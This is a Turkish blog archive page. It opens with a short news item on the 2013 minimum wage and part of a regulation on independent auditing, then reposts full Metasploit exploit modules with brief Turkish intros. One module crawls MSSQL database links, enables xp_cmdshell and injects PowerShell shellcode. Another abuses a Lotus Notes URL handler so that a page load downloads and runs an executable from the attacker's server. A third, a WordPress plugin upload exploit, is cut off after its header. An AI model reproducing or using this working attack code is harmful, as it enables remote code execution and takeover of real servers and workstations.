Archive for 27 Aralık 2012

2013 Yılı Asgari Ücret Artışı Ne Kadar?

Çalışma ve Sosyal Güvenlik Bakanı Faruk Çelik, asgari ücret yeterli mi tartışmasının yapıldığını belirterek “Bu işçilere daha az ücret verilmesini yasaklayan önemli bir sosyal politika aracı” diye konuştu. Türk-İş’in muhalefetiyle kabul edilen yeni asgari ücret yılın ikinci yarısında ise net 804.7 TL olarak uygulanacak. Yılın ilk 6 ayı için yapılan 34.21 TL’lik asgari ücret artışıyla, 1.3 kilogram kıyma, 3.5 kilogram peynir, 26 kutu makarna, 4.7 kilogram ayçiçek yağı alınabiliyor.
SON NOKTAYI BAŞBAKAN ERDOĞAN KOYDU

Read more

BAĞIMSIZ DENETİM YÖNETMELİĞİ

 

26 Aralık 2012  ÇARŞAMBA

Resmî Gazete

Sayı : 28509

YÖNETMELİK

Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumundan:

BAĞIMSIZ DENETİM YÖNETMELİĞİ

BİRİNCİ BÖLÜM

Amaç, Kapsam, Dayanak ve Tanımlar

Amaç

MADDE 1 – (1) Bu Yönetmeliğin amacı; 13/1/2011 tarihli ve 6102 sayılı Türk Ticaret Kanunu ve 26/9/2011 tarihli ve 660 sayılı Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumunun Teşkilat ve Görevleri Hakkında Kanun Hükmünde Kararname çerçevesinde yapılacak bağımsız denetime, bağımsız denetim kuruluşlarına ve bağımsız denetçilere ilişkin usul ve esasları düzenlemektir.

Kapsam

MADDE 2 – (1) Bu Yönetmelik; 6102 sayılı Kanun ve 660 sayılı Kanun Hükmünde Kararname çerçevesinde yapılacak bağımsız denetime, bağımsız denetim kuruluşlarının ve bağımsız denetçilerin; yetkilendirilmelerine, sicil kayıtlarının tutulmasına, yükümlülüklerine, sorumluluklarına, bunların Kurum tarafından incelenmesine ve denetlenmesine ve bunlar hakkında uygulanacak idari yaptırımlara ilişkin usul ve esasları kapsar.

Dayanak

MADDE 3 – (1) Bu Yönetmelik, 26/9/2011 tarihli ve 660 sayılı Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumunun Teşkilat ve Görevleri Hakkında Kanun Hükmünde Kararnamenin 9 uncu, 25 inci ve 27 nci maddelerine dayanılarak hazırlanmıştır.

Tanımlar

MADDE 4 – (1) Bu Yönetmelikte geçen;

a) Bağımsız denetçi: Bağımsız denetim yapmak üzere, 1/6/1989 tarihli ve 3568 sayılı Serbest Muhasebeci Mali Müşavirlik ve Yeminli Mali Müşavirlik Kanununa göre yeminli mali müşavirlik ya da serbest muhasebeci mali müşavirlik ruhsatını almış meslek mensupları arasından Kurum tarafından yetkilendirilen kişileri,

b) Bağımsız denetim: Finansal tablo ve diğer finansal bilgilerin, finansal raporlama standartlarına uygunluğu ve doğruluğu hususunda, makul güvence sağlayacak yeterli ve uygun bağımsız denetim kanıtlarının elde edilmesi amacıyla, denetim standartlarında öngörülen gerekli bağımsız denetim tekniklerinin uygulanarak defter, kayıt ve belgeler üzerinden denetlenmesi ve değerlendirilerek rapora bağlanmasını,

c) Bağımsız denetim ekibi: Bağımsız denetim kuruluşu adına belirli bir bağımsız denetim görevini yerine getirmek üzere, sorumlu denetçi ve onun sorumluluğu altında görev yapan bağımsız denetçilerden oluşan ekibi,

ç) Bağımsız denetim kuruluşu: Kurumca bağımsız denetim yapmakla yetkilendirilen ortakları yeminli mali müşavirlik ya da serbest muhasebeci mali müşavirlik ruhsatını almış meslek mensuplarından oluşan sermaye şirketlerini,

d) Bağımsız denetim resmi sicili (Sicil): Kurum tarafından elektronik ortamda tutulan ve bağımsız denetim kuruluşları ile denetçilerin kayıtlarının izlendiği resmi sicili,

e) Denetim ağı: Bağımsız denetim kuruluşlarının veya bağımsız denetçilerin aralarında hukuki bir bağ olup olmadığına bakılmaksızın; kâr veya maliyet paylaşımını hedefleyen veya ortak bir mülkiyet, kontrol veya yönetimi, ortak kalite kontrol politikalarını ve süreçlerini, ortak bir iş stratejisini, ortak bir marka veya unvan kullanımını ya da mesleki kaynakların önemli bir kısmını ortaklaşa kullanmayı amaçlayan işbirliğine yönelik yapılanmayı,

f) Denetlenen işletme: Bağımsız denetim yaptırmak üzere bağımsız denetim kuruluşu veya bağımsız denetçi ile sözleşme imzalamış olan işletmeleri, Read more

Microsoft SQL Server Database Link Crawling Command Execution

Metasploit tarafından Microsoft SQL Server Database Link Crawling önemli komut çalıştırma açığı bulunmuş olup,
Açığı ilişkin remote exploit aşağıdadır. Açıkla MSSQL üzerinde uzaktan komutlar çalıştırılmakta, bir takım hash ve verilere ulaşılmaktadır. Bu önemli açığı bir an önce kapatmak yerinde olacaktır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/mssql_commands'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::MSSQL
	include Msf::Auxiliary::Report
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Database Link Crawling Command Execution',
			'Description'    => %q{
					This module can be used to crawl MS SQL Server database links and deploy
				Metasploit payloads through links configured with sysadmin privileges using a
				valid SQL Server Login.

					If you are attempting to obtain multiple reverse shells using this module we
				recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
				up a multi/handler to run in the background as a job to support multiple incoming
				shells.

					If you are interested in deploying payloads to spefic servers this module also
				supports that functionality via the "DEPLOYLIST" option.

					Currently, the module is capable of delivering payloads to both 32bit and 64bit
				Windows systems via powershell memory injection methods based on Matthew Graeber's
				work. As a result, the target server must have powershell installed. By default,
				all of the crawl information is saved to a CSV formatted log file and MSF loot so
				that the tool can also be used for auditing without deploying payloads.
			},
			'Author'         =>
				[
					'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
					'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
				],
			'Platform'      => [ 'win' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
					['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
					['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Jan 1 2000',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0
		))

		register_options(
			[
				OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', 'false']),
				OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
				OptString.new('PASSWORD',   [true, 'The password for the specified username'])
			], self.class)

		register_advanced_options(
			[
				OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
			], self.class)
	end

	def exploit
		# Display start time
		time1 = Time.new
		print_status("-------------------------------------------------")
		print_status("Start time : #{time1.inspect}")
		print_status("-------------------------------------------------")

		# Check if credentials are correct
		print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")

		if (not mssql_login_datastore)
			print_error("Invalid SQL Server credentials")
			print_status("-------------------------------------------------")
			return
		end

		# Define master array to keep track of enumerated database information
		masterList = Array.new
		masterList[0] = Hash.new			# Define new hash
		masterList[0]["name"] = ""			# Name of the current database server
		masterList[0]["db_link"] = ""		# Name of the linked database server
		masterList[0]["db_user"] = ""	 	# User configured on the database server link
		masterList[0]["db_sysadmin"] = ""	# Specifies if  the database user configured for the link has sysadmin privileges
		masterList[0]["db_version"] = ""	# Database version of the linked database server
		masterList[0]["db_os"] = ""			# OS of the linked database server
		masterList[0]["path"] = [[]]		# Link path used during crawl - all possible link paths stored
		masterList[0]["done"] = 0			# Used to determine if linked need to be crawled

		shelled = Array.new					# keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system

		# Setup query for gathering information from database servers
		versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
		(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\
		(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
		CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \
		-charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
		master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount"

		# Create loot table to store configuration information from crawled database server links
		linked_server_table = Rex::Ui::Text::Table.new(
			'Header'  => 'Linked Server Table',
			'Ident'   => 1,
			'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
		)
		save_loot = ""

		# Start crawling through linked database servers
		while masterList.any? {|f| f["done"] == 0}
			# Find the first DB server that has not been crawled (not marked as done)
			server = masterList.detect {|f| f["done"] == 0}

			# Get configuration information from the database server
			sql = query_builder(server["path"].first,"",0,versionQuery)
			result = mssql_query(sql, false) if mssql_login_datastore
			parse_results = result[:rows]
			parse_results.each { |s|
				server["name"] = s[0]
				server["db_user"] = s[1]
				server["db_sysadmin"] = s[5]
				server["db_version"] =  s[3]
				server["db_os"] = s[4]
				server["numlinks"] = s[6]
			}
			if masterList.length == 1
				print_good("Successfully connected to #{server["name"]}")
				if datastore['VERBOSE'] == true
					show_configs(server["name"],parse_results,true)
				elsif server["db_sysadmin"] == 1
					print_good("Sysadmin on #{server["name"]}")
				end
			end
			if server["db_sysadmin"] == 1
				enable_xp_cmdshell(server["path"].first,server["name"],shelled)
			end

			# If links were found, determine if they can be connected to and add to crawl list
			if (server["numlinks"] > 0)
				# Enable loot
				save_loot = "yes"

				# Select a list of the linked database servers that exist on the current database server
				print_status("")
				print_status("-------------------------------------------------")
				print_status("Crawling links on #{server["name"]}...")
				# Display number db server links
				print_status("Links found: #{server["numlinks"]}")
				print_status("-------------------------------------------------")
				execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'"
				sql = query_builder(server["path"].first,"",0,execute)
				result = mssql_query(sql, false) if mssql_login_datastore

				result[:rows].each {|name|
					name.each {|name|

						# Check if link works and if sysadmin permissions - temp array to save orig server[path]
						temppath = Array.new
						temppath = server["path"].first.dup
						temppath << name

						# Get configuration information from the linked server
						sql = query_builder(temppath,"",0,versionQuery)
						result = mssql_query(sql, false) if mssql_login_datastore

						# Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
						if result[:errors].empty? and result[:rows] != nil then
							# Assign db query results to variables for hash
							parse_results = result[:rows]

							# Add link server information to loot
							link_status = 'up'
							write_to_report(name,server,parse_results,linked_server_table,link_status)

							# Display link server information in verbose mode
							if datastore['VERBOSE'] == true
								show_configs(name,parse_results)
								print_status("  o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
							else
								if parse_results[0][5] == 1
									print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
								else
									print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
								end
							end

							# Add link to masterlist hash
							unless masterList.any? {|f| f["name"] == name}
								masterList << add_host(name,server["path"].first,parse_results)
							else
								(0..masterList.length-1).each do |x|
									if masterList[x]["name"] == name
										masterList[x]["path"] << server["path"].first.dup
										masterList[x]["path"].last << name
										unless shelled.include?(name)
											if parse_results[0][2]==1
												enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
											end
										end
									else
										break
									end
								end
							end
						else
							# Add to report
							linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']

							# Display status to user
							if datastore['VERBOSE'] == true
								print_status(" ")
								print_error("Linked Server: #{name} ")
								print_error("  o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
								print_status("    Failure could be due to:")
								print_status("    - A dead server")
								print_status("    - Bad credentials")
								print_status("    - Nested open queries through SQL 2000")
							else
								print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
							end
						end
					}
				}
			end
			# Set server to "crawled"
			server["done"]=1
		end

		print_status("-------------------------------------------------")

		# Setup table for loot
		this_service = nil
		if framework.db and framework.db.active
			this_service = report_service(
				:host  => rhost,
				:port => rport,
				:name => 'mssql',
				:proto => 'tcp'
			)
		end

		# Display end time
		time1 = Time.new
		print_status("End time : #{time1.inspect}")
		print_status("-------------------------------------------------")

		# Write log to loot / file
		if (save_loot=="yes")
			filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
			path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
			print_status("Results have been saved to: #{path}")
		end
	end

	# ---------------------------------------------------------------------
	# Method that builds nested openquery statements using during crawling
	# ---------------------------------------------------------------------
	def query_builder(path,sql,ticks,execute)

		# Temp used to maintain the original masterList[x]["path"]
		temp = Array.new
		path.each {|i| temp << i}

		# Actual query - defined when the function originally called - ticks multiplied
		if path.length == 0
			return execute.gsub("'","'"*2**ticks)

		# openquery generator
		else
			sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
			return sql
		end
	end

	# ---------------------------------------------------------------------
	# Method that builds nested openquery statements using during crawling
	# ---------------------------------------------------------------------
	def query_builder_rpc(path,sql,ticks,execute)

		# Temp used to maintain the original masterList[x]["path"]
		temp = Array.new
		path.each {|i| temp << i}

		# Actual query - defined when the function originally called - ticks multiplied
		if path.length == 0
			return execute.gsub("'","'"*2**ticks)

		# Openquery generator
		else
			exec_at = temp.shift
			sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
			return sql
		end
	end

	# ---------------------------------------------------------------------
	# Method for adding new linked database servers to the crawl list
	# ---------------------------------------------------------------------
	def add_host(name,path,parse_results)

		# Used to add new servers to masterList
		server = Hash.new
		server["name"] = name
		temppath = Array.new
		path.each {|i| temppath << i }
		server["path"] = [temppath]
		server["path"].first << name
		server["done"] = 0
		parse_results.each {|stuff|
			server["db_user"] = stuff.at(1)
			server["db_sysadmin"] = stuff.at(2)
			server["db_version"] =  stuff.at(3)
			server["db_os"] = stuff.at(4)
			server["numlinks"] = stuff.at(6)
		}
		return server
	end

	# ---------------------------------------------------------------------
	# Method to display configuration information
	# ---------------------------------------------------------------------
	def show_configs(i,parse_results,entry=false)

		print_status(" ")
		parse_results.each {|stuff|

			# Translate syadmin code
			status = stuff.at(5)
			if status == 1 then
				dbpriv = "sysadmin"
			else
				dbpriv = "user"
			end

			# Display database link information
			if entry == false
				print_status("Linked Server: #{i}")
				print_status("  o Link user: #{stuff.at(1)}")
				print_status("  o Link privs: #{dbpriv}")
				print_status("  o Link version: #{stuff.at(3)}")
				print_status("  o Link OS: #{stuff.at(4).strip}")
				print_status("  o Links on server: #{stuff.at(6)}")
			else
				print_status("Server: #{i}")
				print_status("  o Server user: #{stuff.at(1)}")
				print_status("  o Server privs: #{dbpriv}")
				print_status("  o Server version: #{stuff.at(3)}")
				print_status("  o Server OS: #{stuff.at(4).strip}")
				print_status("  o Server on server: #{stuff.at(6)}")
			end
		}
	end

	# ---------------------------------------------------------------------
	# Method for generating the report and loot
	# ---------------------------------------------------------------------
	def write_to_report(i,server,parse_results,linked_server_table,link_status)
		parse_results.each {|stuff|
			# Parse server information
			db_link_user = stuff.at(1)
			db_link_sysadmin = stuff.at(2)
			db_link_version =  stuff.at(3)
			db_link_os = stuff.at(4)

			# Add link server to the reporting array and set link_status to 'up'
			linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]

			return linked_server_table
		}
	end

	# ---------------------------------------------------------------------
	# Method for enabling xp_cmdshell
	# ---------------------------------------------------------------------
	def enable_xp_cmdshell(path,name,shelled)
		# Enables "show advanced options" and xp_cmdshell if needed and possible
		# They cannot be enabled in user transactions (i.e. via openquery)
		# Only enabled if RPC_Out is enabled for linked server
		# All changes are reverted after payload delivery and execution

		# Check if "show advanced options" is enabled
		execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'show advanced options'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql, false) if mssql_login_datastore
		saoOrig = result[:rows].pop.pop

		# Check if "xp_cmdshell" is enabled
		execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql, false) if mssql_login_datastore
		xpcmdOrig = result[:rows].pop.pop

		# Try blindly to enable "xp_cmdshell" on the linked server
		# Note:
		# This only works if rpcout is enabled for all links in the link path.
		# If that is not the case it fails cleanly.
		if xpcmdOrig == 0
			if saoOrig == 0
				# Enabling show advanced options and xp_cmdshell
				execute = "sp_configure 'show advanced options',1;reconfigure"
				sql = query_builder_rpc(path,"",0,execute)
				result = mssql_query(sql, false) if mssql_login_datastore
			end

			# Enabling xp_cmdshell
			print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
			execute = "sp_configure 'xp_cmdshell',1;reconfigure"
			sql = query_builder_rpc(path,"",0,execute)
			result = mssql_query(sql, false) if mssql_login_datastore
		end

		# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
		execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql, false) if mssql_login_datastore
		xpcmdNow = result[:rows].pop.pop

		if xpcmdNow == 1 or xpcmdOrig == 1
			print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
			if datastore['DEPLOY']
				print_status("Ready to deploy a payload #{name}")
				if datastore['DEPLOYLIST']==""
					datastore['DEPLOYLIST'] = nil
				end
				if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
					print_status("\t - Checking if #{name} is on the deploy list...")
				end
				if datastore['DEPLOYLIST'] != nil
					deploylist = datastore['DEPLOYLIST'].upcase.split(',')
				end
				if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
					if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
						print_status("\t - #{name} is on the deploy list.")
					end
					unless shelled.include?(name)
						powershell_upload_exec(path)
						shelled << name
					else
						print_status("Payload already deployed on #{name}")
					end
				elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
					print_status("\t - #{name} is not on the deploy list")
				end
			end
		else
			print_error("\t - Unable to enable xp_cmdshell on " + name)
		end

		# Revert soa and xp_cmdshell to original state
		if xpcmdOrig == 0 and xpcmdNow == 1
			print_status("\t - Disabling xp_cmdshell on " + name)
			execute = "sp_configure 'xp_cmdshell',0;reconfigure"
			sql = query_builder_rpc(path,"",0,execute)
			result = mssql_query(sql, false) if mssql_login_datastore
		end
		if saoOrig == 0 and xpcmdNow == 1
			execute = "sp_configure 'show advanced options',0;reconfigure"
			sql = query_builder_rpc(path,"",0,execute)
			result = mssql_query(sql, false) if mssql_login_datastore
		end
	end

	# ----------------------------------------------------------------------
	# Method that delivers shellcode payload via powershell thread injection
	# ----------------------------------------------------------------------
	def powershell_upload_exec(path)

		# Create powershell script that will inject shell code from the selected payload
		myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"

		# Unicode encode powershell script
		mytext_uni = Rex::Text.to_unicode(myscript)

		# Base64 encode unicode
		mytext_64 = Rex::Text.encode_base64(mytext_uni)

		# Generate random file names
		rand_filename = rand_text_alpha(8)
		var_duplicates = rand_text_alpha(8)

		# Write base64 encoded powershell payload to temp file
		# This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
		# Also, line number tracking was added so that duplication lines caused by nested linked
		# queries could be found and removed.
		print_status("Deploying payload...")
		linenum = 0
		mytext_64.scan(/.{1,2500}/).each {|part|
			execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
			sql = query_builder(path,"",0,execute)
			result = mssql_query(sql, false) if mssql_login_datastore
			linenum = linenum+1
		}

		# Remove duplicate lines from temp file and write to new file
		execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql, false) if mssql_login_datastore

		# Remove tracking tags from lines
		execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql, false) if mssql_login_datastore

		# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
		# If running on 64bit system, 32bit powershell called from syswow64
		powershell_cmd =  "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
		'*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
		-noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
		powershell_uni = Rex::Text.to_unicode(powershell_cmd)
		powershell_64 = Rex::Text.encode_base64(powershell_uni)

		# Setup query
		execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
		sql = query_builder(path,"",0,execute)

		# Execute the playload
		print_status("Executing payload...")
		result = mssql_query(sql, false) if mssql_login_datastore
		# Remove payload data from the target server
		execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
		sql = query_builder(path,"",0,execute)
		result = mssql_query(sql,false)
	end
end

IBM Lotus Notes Client URL Handler Command Injection

IBM Lotus Notes Client URL Handler Command Injection açığıl bulunmuştur. Açık metasploit tarafından bulunmuş olup, Açığın oluşumu, kullanılışı ve açık hakkındaki exploit aşağıdadır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE
	include Msf::Exploit::FileDropper

	def initialize(info={})
		super(update_info(info,
			'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
			'Description'    => %q{
					This modules exploits a command injection vulnerability in the URL handler for
				for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
				an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
				arguments. This module has been tested successfully on Windows XP SP3 with IE8,
				Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Moritz Jodeit', # Vulnerability discovery
					'Sean de Regge', # Vulnerability analysis
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2012-2174' ],
					[ 'OSVDB', '83063' ],
					[ 'BID', '54070' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
					[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
					[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
				],
			'Payload'        =>
				{
					'Space'           => 2048,
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'EXITFUNC'         => "none",
					'InitialAutoRunScript' => 'migrate -k -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jun 18 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def exploit
		@exe_name = rand_text_alpha(2) + ".exe"
		@stage_name = rand_text_alpha(2) + ".js"
		super
	end

	def on_new_session(session)
		if session.type == "meterpreter"
			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
		end

		@dropped_files.delete_if do |file|
			win_file = file.gsub("/", "\\\\")
			if session.type == "meterpreter"
				begin
					wintemp = session.fs.file.expand_path("%TEMP%")
					win_file = "#{wintemp}\\#{win_file}"
					# Meterpreter should do this automatically as part of
					# fs.file.rm().  Until that has been implemented, remove the
					# read-only flag with a command.
					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
					session.fs.file.rm(win_file)
					print_good("Deleted #{file}")
					true
				rescue ::Rex::Post::Meterpreter::RequestError
					print_error("Failed to delete #{win_file}")
					false
				end

			end
		end

	end

	def on_request_uri(cli, request)

		if request.uri =~ /\.exe$/
			return if ((p=regenerate_payload(cli))==nil)
			register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
			register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
			data = generate_payload_exe({:code=>p.encoded})
			print_status("Sending payload")
			send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
			return
		end

		my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
		if datastore['SSL']
			schema = "https"
		else
			schema = "http"
		end
		uri = "#{schema}://#{my_host}"
		uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

		script = "var w=new ActiveXObject('wscript.shell');"
		script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
		script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
		script << "x.open('GET','#{uri}', false);"
		script << "x.send();"
		script << "var s=new ActiveXObject('ADODB.Stream');"
		script << "s.Mode=3;"
		script << "s.Type=1;"
		script << "s.Open();"
		script << "s.Write(x.responseBody);"
		script << "s.SaveToFile('#{@exe_name}',2);"
		script << "w.Run('#{@exe_name}');"

		vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"

		link_id = rand_text_alpha(5 + rand(5))

		js_click_link = %Q|
		function clickLink(link) {
			var cancelled = false;

			if (document.createEvent) {
				var event = document.createEvent("MouseEvents");
				event.initMouseEvent("click", true, true, window,
					0, 0, 0, 0, 0,
					false, false, false, false,
					0, null);
				cancelled = !link.dispatchEvent(event);
			}
			else if (link.fireEvent) {
				cancelled = !link.fireEvent("onclick");
			}

			if (!cancelled) {
				window.location = link.href;
			}
		}
		|

		if datastore['OBFUSCATE']
			js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
			js_click_link.obfuscate
			js_click_link_fn = js_click_link.sym('clickLink')
		else
			js_click_link_fn = 'clickLink'
		end


		html = <<-EOS
		<html>
		<head>
		<script>
		#{js_click_link}
		</script>
		</head>
		<body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
		<a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
		</body>
		</html>
		EOS

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end

WordPress WP-Property PHP File Upload Vulnerability

WordPress WP-Property versiyonunda PHP File Upload Açığı bulundu. Açık sayesinde php shell upload edilebilmekte, servere erişim sağlanmaktadır. Açığın oluştuğu upload dizinini geçici olarak silmek yerinde olacaktır. Açık metasploit tarafından bulunmuş olup, açığın kullanımına ilişkin exploit aşağıdadır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::PhpEXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
			'Description'    => %q{
					This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
				plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
				temp directory without authentication, which results in arbitrary code execution.
			},
			'Author'         =>
				[
					'Sammy FORGIT',	# initial discovery
					'James Fitts <fitts.james[at]gmail.com>' # metasploit module
